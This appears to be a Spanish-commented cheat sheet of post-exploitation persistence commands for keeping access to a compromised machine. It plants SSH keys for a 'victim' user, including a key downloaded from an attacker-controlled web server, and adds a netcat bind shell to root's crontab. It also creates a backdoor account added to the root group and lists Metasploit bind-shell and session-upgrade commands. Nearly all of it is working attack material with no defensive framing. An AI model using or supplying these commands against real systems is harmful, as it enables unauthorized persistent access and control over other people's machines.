ssh-keygen -t rsa -b 4096
# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco
ssh-copy-id <victim-user>@<target-ip-or-hostname>
# Se solicitará la contraseña del usuario
ssh <victim-user>@<target-ip-or-hostname>
ssh-keygen -t rsa -b 4096
# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco
cd ~/.ssh/
python3 -m http.server 80
# Alternativa con Python2.7
python2 -m SimpleHTTPServer 80
wget http://<attacker-ip>/id_rsa.pub
cat id_rsa.pub >> .ssh/authorized_keys
echo 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshell
echo ' /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/root
adduser -m user -s /bin/bash ftp
passwd ftp
usermod -aG root ftp
use payload/generic/shell_bind_tcp
set RHOST <target-ip>
set LPORT <local-port>
exploit
# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano
sessions -l
sessions -u <session-id>
sessions <session-id>